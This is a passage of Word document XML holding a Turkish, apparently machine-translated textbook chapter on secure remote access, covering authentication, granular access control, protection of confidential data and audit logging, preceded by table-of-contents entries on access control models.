          <w:b/>
        </w:rPr>
        <w:t>ISM: Güvenlik, Standartlar ve Diğer Öğeler Güçlü Güvenlik Desteği</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:226</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007A3DD5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A3DD5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: 2.Erişim Kontrollerinin Uygulanması:227</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007A3DD5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A3DD5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: KATEGORİ KAYNAKLARI:227</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007A3DD5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A3DD5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: Nesne Oluşturma:230</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007A3DD5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A3DD5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: Veri Sınıflandırmalarını Düşürme:230</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007A3DD5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A3DD5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: Etiketleme:230</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A3DD5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: ERİŞİM KONTROL MODELLERİ:231</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00516092" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516092">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: Bell-LaPadula Modeli:232</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00516092" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516092">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: Biba Modeli:232</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00516092" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516092">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: Take-Grant Modeli:233</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516092">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM:Clark-Wilson Modeli:233</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516092">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: Katılmamış Oturumlar:234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516092">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM:KONTROL YÖNETİMİ:236</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516092">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: Gruplandırma Konuları ve Nesneleri:236</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516092">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: Yönetici Arabirimleri:237</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00516092" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516092">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISM: UYGULAMA KONTROLLERİ:238-239</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00516092" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007F7C0D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="665288E9" wp14:editId="075B33AE">
            <wp:extent cx="2926080" cy="3017520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="Resim 21"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Default="00E77DF4" w:rsidP="00E77DF4"/>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1.4.4-1.5.1</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Ebubekir ÇAKMAK</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30757034</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36"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51"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36"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Uzaktan Erişime Güvenli Giriş</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Christina M. Bird, Ph.D, CISSP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Geçtiğimiz on yılda, şirket ağlarına uzaktan erişim sağlama ve kontrol etme sorunu, ağ yöneticileri ve bilgi güvenliği uzmanlarının karşılaştığı en zorlu sorunlardan biri haline geldi.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bilgi temelli işletmeler küresel ekonominin daha büyük ve daha büyük bir bölümü haline geldikçe, “iş” in doğası değişiyor. “İşler”, fabrika, ofis veya mağaza gibi iyi tanımlanmış bir yerde, çalışanların göreceli olarak organize edilen hiyerarşileri arasında önceden belirlenmiş zamanlarda gerçekleşirdi. Ama şimdi, “iş” her yerde gerçekleşiyor: tüm dünyada, günün her saati, çalışanlar, danışmanlar, satıcılar ve müşteri temsilcileri arasında.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Bir çalışan, oturma odasında kişisel bir bilgisayarla ve bir modemle çalışma hattında, montaj hattı olmadan, bir kabin veya görüşte bir yönetici olmadan verimli olabilir. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>İnternet’in iş dünyasında ve kişisel yaşamda bir iletişim aracı olarak yaygın kabul görmesi, yeni bir bilgisayar kullanıcısı grubuna uzaktan erişim kavramını getirmiştir. İnternet erişiminin hız ve basitliğinin çalışma ortamlarına da çevrilmesini beklerler. Seyahat eden çalışanlar, kendi özel ağ bağlantılarının otel odasındaki, sanki evdeymiş gibi kusursuz bir şekilde çalışmasını ister. Bu, çoğunlukla ağ kurmanın temel iş için en iyi olduğu kuruluşlar dahilinde güvenilir ve verimli kurumsal uzaktan erişim sistemlerine olan talebi arttırır.</w:t>
      </w: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Bilgisayar kullanıcılarının özel bir ağda patlaması - şimdi sadece ofis çalışanlarını değil aynı zamanda telekomünikasyon şirketleri, danışmanlar, iş ortakları ve müşterileri de içeren - güvenli uzaktan erişimin tasarımını ve uygulamasını daha da zorlaştırıyor. En basit yerel alan ağlarında (LAN), tüm kullanıcılar ağdaki tüm kaynaklara sınırsız erişime sahiptir. Bazen, giriş ayrıcalıklarını kısıtlayarak, ana bilgisayar düzeyinde ayrıntılı erişim kontrolü sağlanır. Ancak, gerçek dünyadaki çoğu ortamda, muhasebe, insan kaynakları veya araştırma ve geliştirme gibi farklı verilere erişim sınırlı insan grupları ile sınırlandırılmalıdır. Bu kısıtlamalar ağdaki kaynakları fiziksel olarak izole ederek veya mantıksal mekanizmalar (yönlendirici erişim kontrol listeleri ve daha katı duvar teknolojileri dahil) aracılığıyla sağlanabilir. Özellikle fiziksel izolasyon, ağ kaynaklarına önemli ölçüde koruma sağlar ve bazen kasıtlı bir ağ güvenliği stratejisi olmadan da gelişir.</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Uzak çalışanlara, danışmanlara, şubelere ve iş ortağı ağlarına bağlantılar, şirket içinde ve arasında iletişimi son derece verimli kılar; ancak şirket ağlarını ve hassas verileri geniş, potansiyel olarak güvenilmeyen bir kullanıcı topluluğuna ve yeni bir güvenlik açığına maruz bırakırlar. Çalışan olmayan kişilerin gizli bilgileri kullanmalarına izin vermek, veri sınıflandırma ve erişim kontrolü için katı şartlar yaratır. Çalışan olmayanlar için bir kurumsal güvenlik politikası uygulamak için bir ağ altyapısını yönetmek, çoğu ağ yöneticisi ve güvenlik yöneticisi için yeni bir zorluktur. Kuruluşun uzaktan erişim için makul iş gereksinimlerini kolaylaştırmak için güvenlik politikası uyarlanmalıdır. Aynı zamanda, politikalar ve prosedürler, gelişmiş bağlantının, şirket ağındaki veri gizliliği, bütünlüğü ve kullanılabilirliğinden ödün vermesine neden olma ihtimalini en aza indirmeye yardımcı olur.</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Benzer şekilde, şirket şubesi ve müşteri destek grupları da uygun maliyetli, sağlam ve güvenli ağ bağlantıları talep etmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bu bölümde kurumsal uzaktan erişim mimarisi için genel tasarım hedefleri, ortak uzaktan erişim uygulamaları ve sanal özel ağların (VPN'ler) kullanılmasıyla güvenli uzaktan erişim sağlamak için İnternet kullanımı ele alınmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Uzaktan Erişim için Güvenlik Hedefleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51"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Tüm uzaktan erişim sistemleri, meşru kullanıcılar ve ana şirket kampüsünden uzakta bulunan siteler için uygun güvenlik politikalarına tabi özel olarak tutulan bilgisayar kaynaklarına bağlantı kurmak için tasarlanmıştır. Her biri kendine özgü güçlü ve zayıf yönleri olan bu tür sistemler var. Bununla birlikte, gizliliğin, veri bütünlüğünün ve kullanılabilirliğin korunmasının çok önemli olduğu bir ağ ortamında, güvenli bir uzaktan erişim sistemi aşağıdaki özelliklere sahipti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 xml:space="preserve">• Kullanıcıların ve sistemlerin güvenilir bir şekilde doğrulanması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Belirli bilgisayar sistemlerine, dosyalara ve diğer ağ kaynaklarına erişimin kolay yönetilmesi için ayrıntılı bir denetim</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 Gizli verilerin korunması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Sistem kullanımının günlüğe kaydedilmesi ve denetlenmes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İşyeri ortamının daha verimli bir şekilde yeniden üretilmes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Maksimum sayıda uzak kullanıcı ve yere bağlantı</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 Ekipman, ağ bağlantısı ve destek için minimum maliyet</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rsidRPr="002F6FE0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Uzak Kullanıcıların / Ana Bilgisayarların Güvenilir Kimlik Doğrulaması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>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Bariz görünüyor, ancak, bilgisayardaki ve uzaktaki kullanıcılar arasındaki temel farkın, uzaktaki kullanıcıların orada olmadığı üzerinde durmaya değer. Küçük bir kuruluşta bile, minimum güvenlik gereksinimi olan birçok resmi olmayan kimlik doğrulama işlemi gün boyunca gerçekleşir. İş arkadaşları birbirlerini tanır ve tüm ofis boyunca belirli sistemleri kimlerin kullanması gerektiği konusunda bir anlayışa sahiptir. Benzer şekilde, şirketin sunucu odasına kimlerin girip çıkacağına dikkat ederlerse basit bir erişim kontrol mekanizması sağlayabilirler.</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Yüksek güvenlik gereksinimi olan kurumlarda, bir çalışanın veya bir bilgisayarın fiziksel varlığı, kampüs içerisinde kullanılacak tanımlama, doğrulama ve erişim kontrolü mekanizmaları için birçok teknolojik olanak sağlar. Bunlar arasında güvenlik görevlileri, fotoğraf çalışanı kimlik kartları, güvenli alanlara anahtarsız giriş, diğer birçok araç va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Güvenli bir uzaktan erişim sistemi, insan kullanıcıları için çeşitli güçlü kimlik doğrulama mekanizmalarını ve şirketler ve iş ortaklarının şubesi için makinelerin ve ağ geçitlerinin kimliklerini doğrulamak için dijital sertifikaları destekler.</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B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Granül Erişim Kontrolü</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>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İyi bir uzaktan erişim sistemi, ağ sistemleri ve saha dışı bir kullanıcı tarafından erişilebilecek kaynaklar üzerinde esnek bir kontrol sağlar. Yöneticiler, diğer her şeye erişimi reddederken uygun tüm iş amaçlarına erişim sağlamak için tahıl kontrolüne sahip olmalıdır. Bu, farklı kullanıcı türleriyle (çalışanlar, üçüncü taraf müteahhitleri vb.) Güven ilişkilerine dayanan çeşitli erişim politikalarının yönetilmesini sağlar. Erişim kontrol sistemi, kuruluşun güvenlik gereksinimlerini destekleyecek kadar esnek olmalı ve politikalar veya personel değiştiğinde kolayca değiştirilmelidir. Uzaktan erişim sistemi incelikle ölçeklenmeli ve şirketin erişim gereksinimleri geliştikçe daha karmaşık politikalar uygulamasına olanak sağlamalıdır.</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Erişim kontrol sistemleri, ağ tabanlı erişim kontrol listeleri, statik yollar ve ana bilgisayar sistemi ve uygulama tabanlı erişim filtreleri dahil olmak üzere çeşitli mekanizmalardan oluşabilir. İdari arayüzler</w:t>
      </w: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çoklu erişim politikalarını yönetmenize yardımcı olmak için şablonları ve kullanıcı gruplarını, makineleri ve ağları destekleyebilir. Bu kontroller, farklı derecelerde, duvarlar, yönlendiriciler, uzaktan erişim sunucuları ve kimlik doğrulama sunucuları tarafından sağlanabilir. Güvenlik politikası talep ederse, bir ağın çevresinde ve dahili olarak dağıtılabilirle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Uzaktan erişim sisteminin başlatılması, şirket ağında halihazırda mevcut olan güvenlik altyapısına zarar vermemelidir. Bir kuruluş zaten kullanıcı veya dizin tabanlı güvenlik denetimleri uygulamışsa (örneğin, Novell'in Netware Directory Hizmeti veya Windows NT etki alanlarına dayalı olarak), bu denetimlerle bütünleşen bir uzaktan erişim sistemi şirketin yatırımını ve deneyimini artıracaktır.</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B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Gizli Verilerin Korunması</w:t>
      </w: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Genel veya yarı özel ağ altyapısını kullanan uzaktan erişim sistemleri (İnternet ve genel telefon ağı dahil), özel verilerin beklenmedik ellere düşmesi için birçok fırsat sağlar. İnternet, en yaygın olarak bilinen kamu ağıdır, ancak tek değildir. Özel Frame Relay bağlantıları ve uzaktan çevirmeli abonelik hizmetleri (birçok telekomünikasyon sağlayıcısı tarafından sunulan) bile aynı fiziksel devrelerdeki çeşitli konumlardan ve organizasyonlardan veri aktarır. Frame Relay sniffers, ağ yöneticilerinin özel sanal devreler üzerindeki trafiği incelemelerini sağlayan ve ağ geçidi güvenli bağlantılar arasında şaşırtıcı bir miktarda dinlenmeye izin veren emtia ağ cihazlarıdır. Bu sistemlerdeki paket sızıntı raporları, BUGTRAQ ve Firewall-Wizards gibi güvenlik posta listelerinde nispeten yaygındır.</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 xml:space="preserve">İnternette yaygın olarak kabul edilen tehditler, diğer büyük ağlar ve ağ servisleri için de geçerlidir. Böylece, nominal olarak özel uzaktan erişim sistemlerinde bile - modem bankaları ve telefon hatları, kablo modem bağlantıları, Frame Relay devreleri - güvenlik konusunda bilinçli </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>yöneticiler, güçlü şifreleme ve paket başına kimlik doğrulaması gerçekleştiren ekipmanları kullanacaklardır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>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rsidRPr="00B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Sistem Kullanımının Günlüğü ve Denetimi</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B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Güçlü kimlik doğrulama, şifreleme ve erişim kontrolü, kurumsal verilerin korunması için önemli mekanizmalardır. Ancak er ya da geç, her ağ, sistem arızalarından (donanım ya da yazılım), insan hatası ya da saldırısından kaynaklanan ya da kasıtlı bozulmalarla karşı karşıya kalır. Sistem kullanım günlüklerinin ayrıntılı bir şekilde tutulması sistem arızalarının giderilmesine yardımcı olu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Eğer sorun giderme bir ağ problemine bilerek neden olduğunu gösteriyorsa, denetim bilgisi failin takibinde kritik öneme sahiptir. Kişinin kurumsal güvenlik politikası, yalnızca kullanıcıları uzaktan erişim sistemindeki bireysel eylemlerle ilişkilendirme yeteneği kadar iyidir - eğer biri kimin yaptığını söyleyemezse, o zaman kişi kuralları ihlal ettiğini söyleyemez.</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Maalesef, uzaktan erişim ekipmanlarının çoğu, en iyi şekilde basit günlük kaydı yapar. , Kullanıcı adı saklamak başlangıç ​​zamanı ve çağrı süresi - - Çoğu durumda, seviye denetim çağrı kaydedilir, ancak uzak kullanıcı aslında ne yaptığını konusunda yeterli veri yoktur. Eğer şirket ortamı daha sıkı denetim izleri gerektiriyorsa, muhtemelen özel denetim sistemleri tasarlamak zorunda kalacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B40C51" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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B40C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
